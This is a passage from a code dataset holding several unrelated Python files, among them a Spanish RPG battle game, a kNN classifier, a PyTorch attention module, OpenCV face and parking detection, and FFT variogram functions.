mostrar(self):\n\t\tprint(\"Nombre: \",self.nombre,\n\t\t\t\t\t\"\\nTipo: \",self.tipo,\n\t\t\t\t\t\"\\nVida: \",self.vida)\n\t\ndef enemigos(nombre):\n\tyy=[\"Fuego\",\"Hielo\",\"Electro\",\"Agua\"]\n\telemento1=random.choice(yy)\n\telemento2=random.choice(yy)\n\telemento3=random.choice(yy)\n\telemento4=random.choice(yy)\n\telemento5=random.choice(yy)\n\n\t\n\tif str(nombre) == \"Mago Enigmatico\":\n\t\txx=jugador(nombre,str(elemento1),100,15,5,10,10,10)\n\telif str(nombre) == \"Soldado Real\":\n\t\txx=jugador(nombre,str(elemento2),130,20,5,9,15,8)\n\telif str(nombre) == \"Dragon Volador\":\n\t\txx=jugador(nombre,str(elemento3),160,25,5,8,20,6)\n\telif str(nombre) == \"Lobo Agresivo\":\n\t\txx=jugador(nombre,str(elemento4),190,30,5,7,25,4)\n\telif str(nombre) == \"Jefe Final\":\n\t\txx=jugador(nombre,str(elemento5),220,40,5,6,25,15)\n\treturn xx\n\n\n\ndef attack1(atq1,atq2,num):\n\tesquivar=random.randrange(1,100)\n\tgolpe=atq2.vida\n\tresto=atq2.vida\n\tdefensa=atq2.defensa\n\tif esquivar<=atq2.velocidad:\n\t\tif num ==1:\n\t\t\tprint(\"EL ENEMIGO ESQUIVO TU ATAQUE\")\n\t\telse:\n\t\t\tprint(\"ESQUIVASTE EL ATAQUE ENEMIGO\")\n\telse:\n\t\tgolpe=atq2.vida-atq1.ataque+defensa\n\t\t\n\t\tif atq1.tipo==\"Fuego\" and atq2.tipo==\"Hielo\":\n\t\t\tgolpe+=-atq1.elemental\n\t\telif atq1.tipo==\"Fuego\" and atq2.tipo==\"Agua\":\n\t\t\tgolpe+=+atq1.elemental\n\t\telif atq1.tipo==\"Agua\" and atq2.tipo==\"Fuego\":\n\t\t\tgolpe+=-atq1.elemental\n\t\telif atq1.tipo==\"Agua\" and atq2.tipo==\"Electro\":\n\t\t\tgolpe+=+atq1.elemental\n\t\telif atq1.tipo==\"Electro\" and atq2.tipo==\"Agua\":\n\t\t\tgolpe+=-atq1.elemental\n\t\telif atq1.tipo==\"Electro\" and atq2.tipo==\"Hielo\":\n\t\t\tgolpe+=+atq1.elemental\n\t\telif atq1.tipo==\"Hielo\" and atq2.tipo==\"Electro\":\n\t\t\tgolpe+=-atq1.elemental\n\t\telif atq1.tipo==\"Hielo\" and atq2.tipo==\"Fuego\":\n\t\t\tgolpe+=+atq1.elemental\n\n\t\tif random.randrange(1,100) < atq1.pCritico:\n\t\t\tgolpe+=-atq1.ataque\n\t\t\tprint(\"**GOLPE CRITICO**\")\n\t\telse:\n\t\t\tprint(\"Golpe Certero \")\n\t\t\t\n\tprint(\"HIT: \"+str(resto-golpe))\n\ttime.sleep(1)\n\treturn golpe\n\n\ndef reset(num):\n\tos.system('clear')\n\tpj1.mostrar()\n\tprint()\n\tprint(\"***VERSUS***\")\n\tprint()\n\tpj2.mostrar()\n\tprint()\n\tprint(\"<- - - - - - - - - - - - ->\")\n\tif num == 1:\n\t\tinput(\"Enter para ATACAR\")\n\telse:\n\t\tprint(pj2.nombre+\" ATACA\")\n\t\ttime.sleep(1)\n\n\nx=[\"Mago Enigmatico\",\"Soldado Real\",\"Dragon Volador\",\"Lobo Agresivo\",\"Jefe Final\"]\n\n#Seleccion de personaje\nnombre_jugador=input(\"Nombre del Jugador: \")\ndef elHeroe():\n\twhile True:\n\t\ttry:\n\t\t\telemento=int(input(\"Elige ELEMENTO: \\n1) Para Fuego \\n2) Para Agua \\n3) Para Electro \\n4) Para Hielo \\n\"))\n\t\t\tif elemento == 1:\n\t\t\t\tpj=jugador(nombre_jugador,\"Fuego\",150,21,5,10,22,14)\n\t\t\t\tbreak\n\t\t\telif elemento == 2:\n\t\t\t\tpj=jugador(nombre_jugador,\"Agua\",150,15,5,11,24,20)\n\t\t\t\tbreak\n\t\t\telif elemento == 3:\n\t\t\t\tpj=jugador(nombre_jugador,\"Electro\",150,17,5,8,26,18)\n\t\t\t\tbreak\n\t\t\telif elemento == 4:\n\t\t\t\tpj=jugador(nombre_jugador,\"Hielo\",150,19,5,9,20,16)\n\t\t\t\tbreak\n\t\t\tos.system('clear')\n\t\t\tprint(\"Elige una opcion correcta!\")\n\t\texcept ValueError:\n\t\t\tos.system('clear')\n\t\t\tprint(\"Elige una opcion correcta!\")\n\treturn pj\n\n\n\nwhile True:\n\tos.system('clear')\n\tpj1=elHeroe()\n\tconteoEleccion=0\n\tfor i in x:\n\t\tpj2=enemigos(i)\n\t\tturno=random.choice([True,False])\n\t\twhile True:\n\t\t\tif turno == True:\n\t\t\t\treset(1)\n\t\t\t\tpj2.vida=attack1(pj1,pj2,1)\n\t\t\t\tconteoEleccion+=1\n\t\t\t\tif conteoEleccion == 5:\n\t\t\t\t\tos.system('clear')\n\t\t\t\t\tprint(\"Presiona V para recuperar algo de Vida\\nPresiona A para aumentar tu Ataque\\nPresiona D para Aumentar tu Defensa\")\n\t\t\t\t\topciones=str.capitalize(input())\n\t\t\t\t\tconteoEleccion=0\n\t\t\t\t\tif opciones == \"V\":\n\t\t\t\t\t\tq=random.randrange(10,60)\n\t\t\t\t\t\tpj1.vida+=q\n\t\t\t\t\t\tprint(\"VIDA EXTRA: \"+str(q))\n\t\t\t\t\t\ttime.sleep(1)\n\t\t\t\t\telif opciones == \"D\":\n\t\t\t\t\t\tpj1.defensa+=1\n\t\t\t\t\t\tprint(\"DEFENSA AUMENTA +1\")\n\t\t\t\t\t\ttime.sleep(1)\n\t\t\t\t\telif opciones == \"A\":\n\t\t\t\t\t\tpj1.ataque+=1\n\t\t\t\t\t\tprint(\"ATAQUE AUMENTA +1\")\n\t\t\t\t\t\ttime.sleep(1)\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"TOCASTE CUALQUIER COSA, PERDISTE POWER-UP\")\n\t\t\t\t\t\ttime.sleep(1)\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\tturno=False\n\t\t\t\tif pj2.vida<1:\n\t\t\t\t\tprint(\"DERROTASTE A \"+pj2.nombre)\n\t\t\t\t\tprint(\"ViDA +150\")\n\t\t\t\t\tpj1.vida+=150\n\t\t\t\t\tinput()\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\treset(2)\n\t\t\t\tpj1.vida=attack1(pj2,pj1,2)\n\t\t\t\tturno=True\n\t\t\t\tif pj1.vida<1:\n\t\t\t\t\tprint(\"PERDISTE!!!\")\n\t\t\t\t\tinput()\n\t\t\t\t\tbreak\n\t\tif pj1.vida<1:\n\t\t\tprint(\"VUELVE A INTENTARLO\")\n\t\t\tinput()\n\t\t\tbreak\n\n\n\n\n\n\n","repo_name":"ohsenseiwda/Juego-RPG-de-Pelea","sub_path":"SenseiPlus_RPG.py","file_name":"SenseiPlus_RPG.py","file_ext":"py","file_size_in_byte":4622,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"25372659610","text":"import sys\nfrom math import sqrt\nfrom operator import itemgetter\nfrom util import vote, get_data, std_dev\nfrom copy import deepcopy\n\n#calculate Euclidean distance with selected attributes\ndef euclidean_distance(x1, x2, selected_attrs):\n\treturn sqrt(sum([pow((x1[attr] - x2[attr]), 2) for attr in selected_attrs]))\n\ndef get_neighbors(train_data, valid_d, k, selected_attrs):\n\tdistances = {}\n\tfor d in train_data:\n\t\tdis = euclidean_distance(d, valid_d, selected_attrs)\n\t\tdistances[dis] = d\n\treturn [distances[i] for i in sorted(distances.iterkeys())[:k]]\n\ndef kNN_classifier(neighbors, target_attr):\n\treturn vote([n[target_attr] for n in neighbors])\n\ndef normonize(ds, attrs, c_range):\n #data = deepcopy(ds)\n data = ds[:]\n cols = {}\n col_max = {}\n col_min = {}\n for i in c_range:\n cols[i] = [float(d[attrs[i]]) for d in data]\n col_max[i] = max([col for col in cols[i]])\n col_min[i] = min([col for col in cols[i]])\n for i in range(len(data)):\n for j in c_range:\n if not col_max[j]==col_min[j]:\n data[i][attrs[j]] = (float(data[i][attrs[j]]) - col_min[j]) / (col_max[j] - col_min[j])\n else:\n data[i][attrs[j]] = 0.0\n return data\n\t\nif __name__ == \"__main__\":\n filename = sys.argv[1]\n k = int(sys.argv[2])\n\n data, attributes, target_attr = get_data(filename)\n n = len(data)\n\n accs = []\n for i in range(5):\n valid_data = deepcopy(data[int(float(n)/5*i):int(float(n)/5*(i+1))]) #validation data\n train_data = deepcopy([d for d in data if not d in valid_data]) #training data\n labels = [d[target_attr] for d in valid_data]\n\n\t #preprocess data\n if filename == \"breast-cancer-wisconsin.data\":\n c_range = range(5)\n selected_attrs = [attributes[i] for i in c_range]\n train_data = normonize(train_data, attributes, c_range)\n valid_data = normonize(valid_data, attributes, c_range)\n elif filename == \"car.data\":\n cols = [{\"vhigh\":1, \"high\":2, \"med\":3, \"low\":4},\n {\"vhigh\":1, \"high\":2, \"med\":3, \"low\":4},{},{},\n {\"small\":1, \"med\":2, \"big\":3},\n {\"low\":1, \"med\":2, \"high\":3}]\n c_range = range(6)\n for i in range(len(train_data)):\n for j in c_range:\n if j==2:\n if train_data[i][attributes[2]]==\"5more\":\n train_data[i][attributes[2]] = 6\n elif j==3:\n if train_data[i][attributes[3]]==\"more\":\n train_data[i][attributes[3]] = 6\n else:\n train_data[i][attributes[j]] = cols[j][train_data[i][attributes[j]]]\n for i in range(len(valid_data)):\n for j in c_range:\n if j==2:\n if valid_data[i][attributes[2]]==\"5more\":\n valid_data[i][attributes[2]] = 6\n elif j==3:\n if valid_data[i][attributes[3]]==\"more\":\n valid_data[i][attributes[3]] = 6\n else:\n valid_data[i][attributes[j]] = cols[j][valid_data[i][attributes[j]]]\n selected_attrs = [attributes[i] for i in c_range]\n train_data = normonize(train_data, attributes, c_range)\n valid_data = normonize(valid_data, attributes, c_range)\n elif filename == \"ecoli.data\":\n c_range = (1,2,5,6,7)\n selected_attrs = [attributes[i] for i in c_range]\n train_data = normonize(train_data, attributes, c_range)\n valid_data = normonize(valid_data, attributes, c_range)\n elif filename == \"mushroom.data\":\n c_range = range(1, 9)\n cols = [{},{\"b\":1, \"c\":2, \"x\":3, \"f\":4, \"k\":5, \"s\":6},\n {\"f\":1, \"g\":2, \"y\":3, \"s\":4},\n {\"n\":1, \"b\":2, \"c\":3, \"g\":4, \"r\":5, \"p\":6, \"u\":7, \"e\":8, \"w\":9, \"y\":10},\n {\"t\":1, \"f\":2}, {\"a\":1, \"l\":2, \"c\":3, \"y\":4, \"f\":5, \"m\":6, \"n\":7, \"p\":8, \"s\":9},\n {\"a\":1, \"d\":2, \"f\":3, \"n\":4}, {\"c\":1, \"w\":2, \"d\":3}, {\"b\":1, \"n\":2}]\n selected_attrs = [attributes[i] for i in c_range]\n for i in range(len(train_data)):\n for j in c_range:\n train_data[i][attributes[j]] = cols[j][train_data[i][attributes[j]]]\n for i in range(len(valid_data)):\n for j in c_range:\n valid_data[i][attributes[j]] = cols[j][valid_data[i][attributes[j]]]\n train_data = normonize(train_data, attributes, c_range)\n valid_data = normonize(valid_data, attributes, c_range)\n elif filename == \"letter-recognition.data\":\n c_range = range(1, 17)\n selected_attrs = [attributes[i] for i in c_range]\n train_data = normonize(train_data, attributes, c_range)\n valid_data = normonize(valid_data, attributes, c_range)\n\n classification = []\n for d in valid_data:\n neighbors = get_neighbors(train_data, d, k, selected_attrs)\n c = kNN_classifier(neighbors, target_attr)\n classification.append(c)\n count = 0\n for x,y in zip(classification, labels):\n if x==y:\n count += 1\n acc = float(count)/len(classification)\n accs.append(acc)\n print(\"accuracy: \" + str(100*acc) + \"%\")\n print(\"standard deviation: \" + str(std_dev(accs)))","repo_name":"albert-001/CS","sub_path":"CS6735/ML/source/kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"40987165459","text":"from typing import Tuple\n\nimport torch\nimport math\nimport torch.nn.functional as F\nimport torch.nn as nn\n\n\nclass MultiHeadAttention(nn.Module):\n \"\"\"\n One of the most popular part in NLP.\n If you understand self attention, you will understand the heard of transformers.\n \"\"\"\n def __init__(self, embedding_length: int, heads: int, mask = None) -> None:\n super().__init__()\n self.e_length = embedding_length\n self.heads = heads\n self.mask = mask\n self.one_head = int(embedding_length/self.heads)\n self.TW = self._trainable_weights()\n\n def _trainable_weights(self) -> Tuple[nn.Module, nn.Module, nn.Module, nn.Module]:\n q = nn.Linear(self.one_head, self.one_head, bias=False)\n k = nn.Linear(self.one_head, self.one_head, bias=False)\n v = nn.Linear(self.one_head, self.one_head, bias=False)\n out_cnct = nn.Linear(self.e_length, self.e_length)\n return q, k, v, out_cnct\n\n def forward(self, query: torch.Tensor, key: torch.Tensor, value: torch.Tensor) -> torch.Tensor:\n # Scaled Dot-Product Attention\n q, k, v, out_cnct = self.TW\n\n batch_size = key.size(0)\n seq_len = key.size(1)\n seq_len_query = query.size(1) # for decoder\n\n query = query.view(batch_size, seq_len_query, self.heads, self.one_head)\n key = key.view(batch_size, seq_len, self.heads, self.one_head)\n value = value.view(batch_size, seq_len, self.heads, self.one_head)\n\n query = q(query)\n key = k(key)\n value = v(value)\n\n # transpose to get right dimensions, this almost blow my mind\n query = query.transpose(1,2)\n key = key.transpose(1,2)\n value = value.transpose(1,2)\n\n s = torch.matmul(query, key.transpose(-1,-2))\n\n if self.mask is not None:\n s = s.masked_fill(self.mask == 0, float(\"-1e20\"))\n\n w = s / math.sqrt(self.one_head)\n w = F.softmax(w, dim=-1)\n to_concat = torch.matmul(w, value)\n\n # compress it together\n to_concat = to_concat.transpose(1,2).contiguous().view(batch_size, seq_len_query, self.e_length)\n\n return out_cnct(to_concat)\n\nif __name__ == \"__main__\":\n embdd_len = 512\n heads = 8\n x = torch.randint(0, 500, (32, 10, embdd_len), dtype=torch.float32)\n model = MultiHeadAttention(embdd_len, heads)\n print(model(x, x, x))\n","repo_name":"SamuelHudec/pytorch_challenges","sub_path":"challenge_02/multihead_solution.py","file_name":"multihead_solution.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"25971811379","text":"import cv2\r\n\r\nclass FaceIn:\r\n def __init__(self): # 初始化\r\n data = {\"flag\": False, \"image\": None} #flag:是否有人臉\r\n self.data = data\r\n\r\n def detectFace(self, img):\r\n self.data[\"flag\"] = False\r\n self.data[\"image\"] = img \r\n grayImg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) #將圖片轉成灰階\r\n color = (0, 255, 0)\r\n face_classifier = cv2.CascadeClassifier(\r\n cv2.data.haarcascades + \"haarcascade_frontalface_default.xml\")\r\n faceRects = face_classifier.detectMultiScale(\r\n grayImg, scaleFactor=1.25, minNeighbors=3, minSize=(32, 32)) #進行人臉辨識\r\n\r\n if len(faceRects): #如果有人臉\r\n self.data[\"flag\"] = True\r\n for faceRect in faceRects:\r\n x, y, w, h = faceRect\r\n cv2.rectangle(img, (x, y), (x + h, y + w), color, 2) #為人臉加上框\r\n self.data[\"image\"] = img\r\n\r\n return self.data #回傳data\r\n","repo_name":"CLoveYC/I-am-watching-you","sub_path":"FaceIn.py","file_name":"FaceIn.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"10937014057","text":"import time\nimport RPi.GPIO as GPIO\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(8, GPIO.OUT)\n\n\n\ndef buzz():\n p = GPIO.PWM(8, 6888)\n p.start(0)\n\n for i in range(0, 1):\n for dc in range(0, 101, 5):\n p.ChangeDutyCycle(dc)\n time.sleep(0.04)\n #for dc in range(100, -1, -5):\n # p.ChangeDutyCycle(dc)\n # time.sleeap(0.1)\n p.stop()\n\nif __name__ == \"__main__\":\n buzz()\n","repo_name":"flybirp/raspberry_car","sub_path":"Act/control_buzzer.py","file_name":"control_buzzer.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"553576281","text":"# Definition for a Node.\nclass Node:\n def __init__(self, val, left, right):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def treeToDoublyList(self, root):\n \"\"\"\n\n Convert a BST to a sorted circular doubly-linked list in-place.\n Think of the left and right pointers as synonymous to the previous and next pointers in a doubly-linked list.\n\n Let's take the following BST as an example, it may help you understand the problem better:\n\n\n\n We want to transform this BST into a circular doubly linked list.\n Each node in a doubly linked list has a predecessor and successor.\n For a circular doubly linked list, the predecessor of the first element is the last element, and the successor of the last element is the first element.\n The figure below shows the circular doubly linked list for the BST above.\n The \"head\" symbol means the node it points to is the smallest element of the linked list.\n\n Specifically, we want to do the transformation in place. After the transformation, the left pointer of the tree node should point to its predecessor,\n and the right pointer should point to its successor. We should return the pointer to the first element of the linked list.\n The figure below shows the transformed BST. The solid line indicates the successor relationship, while the dashed line means the predecessor relationship.\n\n :type root: Node\n :rtype: Node\n \"\"\"\n\n if not root:\n return None\n\n lhead = self.treeToDoublyList(root.left)\n rhead = self.treeToDoublyList(root.right)\n\n if not lhead and not rhead:\n root.left = root\n root.right = root\n return root\n elif lhead and rhead:\n lmax_node = lhead.left\n rmax_node = rhead.left\n # insert root into the doubly linked list.\n root.left = lmax_node\n lmax_node.right = root\n root.right = rhead\n rhead.left = root\n\n # make the circular\n lhead.left = rmax_node\n rmax_node.right = lhead\n return lhead\n elif lhead:\n lmax_node = lhead.left\n root.left = lmax_node\n lmax_node.right = root\n lhead.left = root\n root.right = lhead\n return lhead\n elif rhead:\n rmax_node = rhead.left\n root.right = rhead\n rhead.left = root\n root.left = rmax_node\n rmax_node.right = root\n return root\n\n\n\n### Follow up: How to convert a double linklist into balanced BST\n\"\"\"\n1) Get the Middle of the linked list and make it root.\n2) Recursively do same for left half and right half.\n a) Get the middle of left half and make it left child of the root\n created in step 1.\n b) Get the middle of right half and make it right child of the\n root created in step 1.\n\"\"\"\n\n\n","repo_name":"ljia2/leetcode.py","sub_path":"solutions/tree/426.Convert.Binary.Search.Tree.to.Sorted.Doubly.Linked.List.py","file_name":"426.Convert.Binary.Search.Tree.to.Sorted.Doubly.Linked.List.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"29459183865","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 13 21:36:20 2018\n\n@author: cxs\n\"\"\"\n\nimport cv2\nimport numpy as np\nimport math\n\nclass Getlen:\n def __init__(self,p1,p2):\n self.x=p1[0]-p2[0]\n self.y=p1[1]-p2[1]\n #用math.sqrt()求平方根\n self.len= math.sqrt((self.x**2)+(self.y**2))\n #定义得到直线长度的函数\n def getlen(self):\n return self.len\n\ndef detectGarage(img):\n try:\n frame = cv2.blur(img,(7,7))\n\n lower_blue = np.array([70,0,0])\n upper_blue = np.array([135,255,160])\n hsv = cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)\n lot = cv2.inRange(hsv, lower_blue, upper_blue)\n kernel = np.ones((10,10),np.uint8)\n\n for _ in range(3):\n lot = cv2.erode(lot,kernel,iterations = 1)\n lot = cv2.dilate(lot,kernel,iterations = 1)\n \n for _ in range(3):\n lot = cv2.dilate(lot,kernel,iterations = 1)\n lot = cv2.erode(lot,kernel,iterations = 1)\n \n out_binary, contours, hierarchy = cv2.findContours(lot,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE) \n max_cnt = 0\n max_area = 0\n for cnt in contours:\n if cv2.contourArea(cnt) < 640*480*0.0025 or cv2.contourArea(cnt) > 640*480*0.95:\n contours.remove(cnt)\n \n if cv2.contourArea(cnt) > max_area:\n max_area = cv2.contourArea(cnt)\n max_cnt = cnt\n \n #hull=cv2.convexHull(max_cnt)\n epsilon=0.05*cv2.arcLength(max_cnt,True)\n approx=cv2.approxPolyDP(max_cnt,epsilon,True)\n \n center_line,center=pointsProcess1(approx)\n front_center=pointsProcess2(approx)\n \n if (abs(center[1]-center_line[1])>=1.0):\n #The angle between the center line of the parking space and the middle line of the picture\n err_angle = math.atan ((-1.0*(center[0]-center_line[0])/(center[1]-center_line[1]))) \n else:\n err_angle=0\n \n sp = lot.shape\n height = sp[0] # height(rows) of image\n width = sp[1] # width(colums) of image\n\n if center[1]<240:\n err_position =(front_center[0] -width/2)/320.0#The vertical distance to the center of the car\n status=1\n else:\n err_position =(center[0] -width/2)/320.0\n status=2\n stopFlagDist = Getlen((width/2 , height),center)\n if(stopFlagDist.getlen() < 70 or center[1]>440):\n stop = True\n else:\n stop = False\n\n return {'error':False,'stop':stop,'status':status,'err_position':err_position,'err_angle':err_angle}\n except:\n return {'error':True,'stop':True} \n\n#get center of further line and center of the garage\ndef pointsProcess1(approx):\n lt_x,lt_y=480,480\n rt_x,rt_y=480,480\n sum_x,sum_y,num_p=0,0,0\n for _ in approx:\n p=_[0]\n if p[1]=lt_y and p[0] != lt_x:\n rt_x,rt_y=p[0],p[1]\n if (lt_x>rt_x):\n lt_x,rt_x=rt_x,lt_x\n lt_y,rt_y=rt_y,lt_y\n cx,cy=float(sum_x)/num_p,float(sum_y)/num_p\n return ((lt_x+rt_x)/2,(lt_y+rt_y)/2),(int(cx),int(cy))\n\n #get center of closer line \ndef pointsProcess2(approx):\n lt_x,lt_y=0,0\n rt_x,rt_y=0,0\n for _ in approx:\n p=_[0]\n if p[1]>lt_y:\n lt_x,lt_y=p[0],p[1]\n for _ in approx:\n p=_[0]\n if p[1]>rt_y and p[1]<=lt_y and p[0] != lt_x:\n rt_x,rt_y=p[0],p[1]\n if (lt_x>rt_x):\n lt_x,rt_x=rt_x,lt_x\n lt_y,rt_y=rt_y,lt_y\n return ((lt_x+rt_x)/2,(lt_y+rt_y)/2)\n","repo_name":"zhangciiiii/EI315-PiCar","sub_path":"2/park.py","file_name":"park.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"11831726848","text":"\r\n\"\"\"if you run this code it will prompts you for the keyword to search for,\r\nthen around 20 images respective to your keyword will be downloaded locally\"\"\"\r\n\r\nfrom serpapi import GoogleSearch\r\nimport requests,os\r\nfrom PIL import Image\r\nimport requests\r\nimport io\r\nimport config\r\nfrom PIL import Image\r\nimport random\r\n\r\n\r\nsearch_key = input(\"Keyword: \")\r\n\r\nquery = search_key\r\nprint(query)\r\n \r\nparams = {\r\n \"q\": search_key,\r\n \"engine\": \"google_images\",\r\n \"ijn\": random.randint(1,5),\r\n \"api_key\": config.api_key\r\n}\r\n\r\nsearch = GoogleSearch(params)\r\nresults = search.get_dict()\r\nimages_results = results[\"images_results\"]\r\ncount = 0\r\nresult = []\r\nfor img in range(3):\r\n result.append(results[\"images_results\"][img][\"original\"])\r\n if \"gif\" not in result[img].split(\".\"):\r\n print(result)\r\n count += 1\r\nprint(count)\r\n\r\n\r\ndef save_images(search_key,image_urls):\r\n \r\n min_re=(0,0)\r\n max_re=(1920,1080)\r\n for indx,image_url in enumerate(image_urls):\r\n try:\r\n search_string = ''.join(e for e in search_key if e.isalnum())\r\n image = requests.get(image_url,timeout=5)\r\n if image.status_code == 200:\r\n with Image.open(io.BytesIO(image.content)) as image_from_web:\r\n try:\r\n filename = \"%s%s.%s\"%(search_string,str(indx),\r\n image_from_web.format.lower())\r\n image_path = os.path.join(r\"C:\\Users\\RAJ\\OneDrive\\Pictures\\New folder\", filename)\r\n image_from_web.save(image_path)\r\n except OSError:\r\n print(\"some exception needs to be done\")\r\n rgb_im = image_from_web.convert('RGB')\r\n rgb_im.save(image_path)\r\n image_resolution = image_from_web.size\r\n if image_resolution != None:\r\n if image_resolution[0]max_re[0] or image_resolution[1]>max_re[1]:\r\n image_from_web.close()\r\n os.remove(image_path)\r\n image_from_web.close()\r\n except Exception as e: \r\n print(e)\r\n\r\nsave_images(search_key,result)","repo_name":"DeKabilan/Content2Image_Converter","sub_path":"text2img.py","file_name":"text2img.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"27602562010","text":"# The array is virtually split into a sorted and an unsorted part. \n# Values from the unsorted part are picked and placed at the correct position in the sorted part.\n\narray = [7,5,9,0,3,1,6,2,4,8]\n\nfor i in range(1,len(array)):\n for j in range(i, 0, -1):\n if array[j] < array[j-1]:\n array[j], array[j-1] = array[j-1], array[j]\n else:\n break\nprint(array)\n\n# Run Time = O(N^2), But much efficient when data is almost sorted already.\n","repo_name":"sjyb9394/Python-Study","sub_path":"Algorithm/Sorting/Insertion_Sort.py","file_name":"Insertion_Sort.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"33388407727","text":"\nimport mpstool.img as mpsimg\nimport numpy as np\n\n\ndef distmap(shape):\n \"\"\"\n Computes the distance matrix in number of cells. This is used\n in conjunction the variogram function.\n \"\"\"\n nl = shape[0]\n nc = shape[1]\n xx, yy = np.meshgrid(np.arange(0, nl), np.arange(0, nc))\n xx = xx - nl / 2\n yy = yy - nc / 2\n dd = np.sqrt(xx**2 + yy**2)\n return dd\n\n\ndef buildindicator_(z):\n \"\"\"\n Internal function used by fftvariogram() and fftcrossvariogram()\n\n It builds an indicator function matrix. This matrix contains\n 1 everywhere, and 0 for missing values in the input matrix z.\n It also replaces NaN with 0 in the original matrix.\n\n It returns the indicator, and the corrected input.\n \"\"\"\n # Builds indicator matrix assuming many 1\n indic = np.ones(z.shape)\n # Locates the missing values (NaN)\n znan = np.isnan(z)\n indic[znan] = 0 # replace NaN by zero\n z[znan] = 0 # replace NaN by zero in original data\n return indic, z\n\n\ndef reduce_matrix_(m, nr, nc, nr2, nc2, nr8, nc8):\n \"\"\"\n Internal function used by fftvariogram() to reduce the size\n of the matrix m, that was expanded to accelerate the fft.\n Only the relevant data are kept in the final result.\n \"\"\"\n g = np.zeros((nr2, nc2))\n g[0:nr, 0:nc] = m[0:nr, 0:nc]\n g[0:nr, nc:nc2] = m[0:nr, nc8-nc+1:nc8+1]\n g[nr:nr2, 0:nc] = m[nr8-nr+1:nr8+1, 0:nc]\n g[nr:nr2, nc:nc2] = m[nr8-nr+1:nr8+1, nc8-nc+1:nc8+1]\n g = np.fft.fftshift(g)\n return g\n\n\ndef fftvariogram(input_image):\n \"\"\"\n Computes the variogram map of a 2D image using Fast Fourier Transform\n\n Parameters\n ----------\n\n input_image : numpy array or mps_toolbox image\n the input image\n\n Returns\n -------\n\n gmap : numpy array\n the variographic map\n\n nbpairs : numpy array\n the number of pairs\n\n Examples\n --------\n\n >>> gmap, npairs = fftvariogram(image)\n\n Method\n -------\n\n Since the computation of a variogram map requires to compute\n convolution products, it can be accelerated using Fast Fourier Transform.\n The method was proposed by:\n\n Marcotte (1996) Fast Variogram Computation with FFT, Computers and\n Geosciences, 22(10): 1175-1186\n\n This approach is faster than the tradional spatial shift method\n when the size of the image is large enough.\n\n \"\"\"\n\n # Transform the input into a numpy array\n if isinstance(input_image, mpsimg.Image):\n input_image = input_image.asArray()\n\n # Copy input in array z\n z = input_image.copy()\n\n # Image size\n nr = z.shape[0]\n nc = z.shape[1]\n if len(z.shape) > 2:\n tmp = z.shape[2]\n if tmp > 1:\n raise ValueError('the input image must be 2D')\n\n # Ensure proper size before running FFT\n z.shape = (nr, nc,)\n\n # Variogram map size\n nr2 = 2*nr-1\n nc2 = 2*nc-1\n\n # Find the closest multiple of 8\n nr8 = int(np.ceil(nr2 / 8) * 8)\n nc8 = int(np.ceil(nc2 / 8) * 8)\n\n # Matrix of ones (used as an indicator function = 0 for missing values)\n m1, z = buildindicator_(z)\n\n # Fourrier transforms\n zf = np.fft.fft2(z, (nr8, nc8))\n z2f = np.fft.fft2(z * z, (nr8, nc8))\n m1f = np.fft.fft2(m1, (nr8, nc8))\n\n # Number of pairs\n npairs = np.round(np.real(np.fft.ifft2(m1f.conjugate() * m1f)))\n npairs = np.maximum(npairs, 1) # To avoid division by zero\n\n # Assemble the variogram computation\n tmp = m1f.conjugate() * z2f + z2f.conjugate() * m1f\n tmp -= 2 * zf.conjugate() * zf\n gmap = 0.5 * np.real(np.fft.ifft2(tmp)) / npairs\n\n # Shift the matrices for readability\n npairs = reduce_matrix_(npairs, nr, nc, nr2, nc2, nr8, nc8)\n gmap = reduce_matrix_(gmap, nr, nc, nr2, nc2, nr8, nc8)\n\n return gmap, npairs\n\n\ndef vario_error(g1, g2, d, npairs):\n \"\"\"\n Computes a normalized error between two variogram maps\n\n The variogram maps are produced for example by the fftvariogram() function.\n They are centered around the zero lag position.\n\n Parameters\n ----------\n\n g1 : numpy array\n the first variogram map\n\n g2 : numpy array\n the second variogram map\n\n d : numpy array\n distance map, the distance is zero for the central location\n this map can be constructed with the function distmap()\n\n npairs : numpy array\n map of the number of pairs for each value in the variogram map\n this map is returned by the function fftvariogram()\n\n Returns\n -------\n\n error : float\n the weighted sum of error between the two variogram maps\n\n\n \"\"\"\n\n weight = npairs / d**2\n weight /= np.sum(weight)\n error = np.abs(g1 - g2) * weight\n return np.sum(error)\n\n\ndef fftcrossvariogram(input_image1, input_image2):\n \"\"\"\n Computes the cross variogram map of 2 2D images using FFT\n\n Parameters\n ----------\n\n input_image1 : numpy array or mps_toolbox image\n the first input image\n\n input_image2 : numpy array or mps_toolbox image\n the second input image\n\n Returns\n -------\n\n gmap1 : numpy array\n the variographic map for the first image\n\n gmap2 : numpy array\n the variographic map for the second 